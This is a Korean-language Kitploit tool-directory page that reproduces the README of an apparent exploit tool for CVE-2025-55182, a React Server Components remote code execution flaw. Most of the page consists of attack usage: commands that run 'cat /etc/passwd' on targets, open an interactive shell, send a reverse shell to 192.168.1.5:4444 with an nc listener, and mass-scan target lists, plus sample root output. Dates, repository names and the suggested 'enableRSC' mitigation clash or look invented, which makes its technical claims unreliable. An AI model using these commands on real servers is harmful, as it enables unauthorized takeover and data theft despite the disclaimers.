Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182_liyon — # CVE-2025-55182 (React Server Components RCE) 기반 Python 익스플로잇 대화형 셸, 리버스 셸, 배치 스캐닝, 그리고 Docker 기반 취약 환경을 포함하여 승인된 보안 테스트를 위한 Python 기반 익스플로잇입니다. | Kitploit
도구/GitHubGitHub/hujiaozhuzhu/cve-2025-55182_liyon
Vulnerability ScannersPayload GenerationExploitationShellcodeWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRed Teaming
Remote Access Tool
GitHubhujiaozhuzhu/cve-2025-55182_liyon

CVE-2025-55182_liyon

# CVE-2025-55182 (React Server Components RCE) 기반 Python 익스플로잇 대화형 셸, 리버스 셸, 배치 스캐닝, 그리고 Docker 기반 취약 환경을 포함하여 승인된 보안 테스트를 위한 Python 기반 익스플로잇입니다.

저장소 보기
35개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 - React Server Components RCE

⚠️ 법적 고지: 이 도구는 보안 연구, 공인된 침투 테스트 및 교육 목적으로만 사용됩니다. 명시적 허가 없이 이 도구를 대상 시스템에 사용하는 것은 불법이며 비윤리적입니다.

📋 개요

CVE-2025-55182는 React Server Components(RSC)의 치명적인 원격 코드 실행(RCE) 취약점으로, 인증되지 않은 공격자가 악의적인 JavaScript 역직렬화를 통해 서버에서 임의 코드를 실행할 수 있게 합니다.

🎯 취약점 세부 정보

속성값
CVE IDCVE-2025-55182
CVSS 점수9.8 (치명적)
공격 벡터네트워크
공격 복잡도낮음
요구 권한없음
사용자 상호작용없음
영향높음 (기밀성, 무결성, 가용성)
영향받는 구성 요소React Server Components (RSC)
영향받는 버전React 18.x - 19.x (특정 빌드 버전)
공개 날짜2025년 12월 3일
CVE 별칭React2Shell

🔍 기술 세부 정보

근본 원인: React Server Components는 RSC 페이로드를 처리할 때 사용자가 제공한 JavaScript 객체를 올바르게 역직렬화하지 않아, 공격자가 서버에서 실행되는 악성 코드를 주입할 수 있습니다.

공격 벡터: HTTP 요청의 악성 RSC 페이로드 영향: 인증 없는 원격 코드 실행, 서버 장악, 데이터 유출

🚀 기능

  • ✅ 대화형 셸을 제공하는 단일 파일 Python 익스플로잇 도구
  • ✅ 자동화된 취약점 탐지
  • ✅ 멀티스레딩을 지원하는 대량 스캔
  • ✅ Docker 기반 취약한 React 환경
  • ✅ 다양한 페이로드 유형 지원
  • ✅ 상세 로깅 및 오류 처리
  • ✅ 리버스 셸 수립
  • ✅ Base64 페이로드 인코딩

📦 설치

root@kitploit:~
# 克隆仓库
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju

# 安装依赖
pip install -r requirements.txt

🎯 사용 방법

빠른 시작

root@kitploit:~
# 安装依赖
pip install requests

# 在易受攻击的目标上执行命令
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"

# 交互式Shell模式
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell

고급 옵션

root@kitploit:~
# 自定义命令
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"

# 使用自定义IP/端口建立反向Shell
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

# 批量扫描
python exploit/batch_scanner.py -f targets.txt

# 详细模式
python exploit/cve_2025_55182.py -u http://target.com -v

# 自定义User-Agent
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"

🏗️ 실습 환경 구축

Docker 사용 (권장)

root@kitploit:~
cd target
docker-compose up -d

수동 구축

root@kitploit:~
cd target
npm install
npm run dev

취약한 애플리케이션 접속: http://localhost:3000

📊 공격 시나리오

시나리오 1: 명령 실행

취약한 서버에서 단일 명령 실행:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com -c "id"

예상 출력:

root@kitploit:~
[+] 漏洞检测成功:React Server Components RCE
[+] 执行命令: id
[+] 响应:
uid=0(root) gid=0(root) groups=0(root)

시나리오 2: 대화형 셸

취약한 서버에서 대화형 셸 획득:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com --shell

기능:

  • 탭 완성
  • 명령 기록
  • 다중 셸 세션
  • 파일 업로드/다운로드

시나리오 3: 리버스 셸

리버스 셸 연결 수립:

root@kitploit:~
# 在攻击者机器上
nc -lvnp 4444

# 运行利用工具
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

시나리오 4: 대량 스캔

여러 대상에 대한 취약점 스캔:

root@kitploit:~
# 创建目标文件
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF

# 运行批量扫描器
python exploit/batch_scanner.py -f targets.txt

🛡️ 완화 및 방어

즉시 조치

  1. React 업그레이드

    root@kitploit:~
    npm install react@latest
    # 升级到修复版本
    
  2. RSC 요청 차단

    root@kitploit:~
    // 临时禁用RSC
    const config = {
      enableRSC: false
    }
    
  3. WAF 규칙

    • RSC 패턴이 포함된 요청 차단
    • 의심스러운 JavaScript 페이로드 모니터링
    • RSC 엔드포인트에 속도 제한 적용

장기적 수정

  • RSC 페이로드에 대한 입력 검증 구현
  • 샌드박스 처리된 JavaScript 실행 사용
  • 정기적인 보안 감사
  • 승인되지 않은 RSC 접근 모니터링

📚 문서

  • 취약점 분석 - 기술 심층 분석
  • 사용 가이드 - 전체 사용 설명
  • 방어 및 수정 - 보안 강화

🧪 테스트

수동 테스트

root@kitploit:~
# 搭建易受攻击环境
cd target && docker-compose up -d

# 测试漏洞
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"

자동화 테스트

root@kitploit:~
# 运行测试套件
python tests/test_exploit.py

🔬 연구 참고 자료

  • CVE-2025-55182 NVD 항목
  • React 보안 공지
  • Wiz 연구 블로그
  • Project Zero 분석

📝 변경 로그

v1.0.0 (2025-04-02)

  • 초기 릴리스
  • 단일 대상 RCE 익스플로잇
  • 대화형 셸 모드
  • 리버스 셸 지원
  • 대량 스캔
  • Docker 취약 환경
  • 포괄적인 문서

🎓 교육 목적

이 도구는 다음을 시연합니다:

  • React에서 RCE 취약점이 어떻게 작동하는지
  • 올바른 취약점 개발 관행
  • 보안 평가 방법론
  • 윤리적 해킹 원칙

👥 기여자

  • 보안 연구원 - 초기 구현

📄 라이선스

이 프로젝트는 MIT 라이선스 하에 제공됩니다 - 자세한 내용은 LICENSE 파일을 참조하십시오.

⚠️ 법적 및 윤리적 고지

중요: 이 도구는 교육 및 공인된 보안 테스트 목적으로만 사용됩니다.

법적 요구 사항

  • 소유하거나 명시적 허가를 받은 시스템에서만 사용
  • 모든 해당 법률 및 규정 준수
  • 취약점을 공급업체에 책임 있게 보고
  • 책임 있는 공개 지침 준수

금지 행위

  • 컴퓨터 시스템에 대한 무단 접근
  • 허가 없이 시스템을 대상으로 삼는 행위
  • 악의적인 목적으로 취약점 사용
  • 데이터 유출 또는 파기

법적 결과

  • 무단 접근에 대한 형사 고발
  • 손해에 대한 민사 책임
  • 잠재적 징역형
  • 직업적 결과

이 도구를 사용함으로써 귀하는 다음에 동의합니다:

  • 모든 지역 및 국제 법률 준수
  • 공인된 보안 테스트에만 사용
  • 발견된 취약점을 책임 있게 보고
  • 악의적 또는 불법 활동에 사용하지 않음

📞 취약점 보고

프로덕션 시스템에서 이 취약점을 발견한 경우:

  1. 공급업체에 보고

    • React 팀: [email protected]
    • 책임 있는 공개 절차 준수
  2. CVE 배정

    • NIST NVD에 제출
    • 공개 일정 준수
  3. 보안 커뮤니티

    • 발견 사항 공유(패치 적용 후)
    • 보안 지식에 기여

기억하세요: 보안 연구는 항상 윤리적이고 합법적이어야 합니다. 여러분의 기술로 인터넷을 더 안전하게 만드세요! 🛡️

도구 다운로드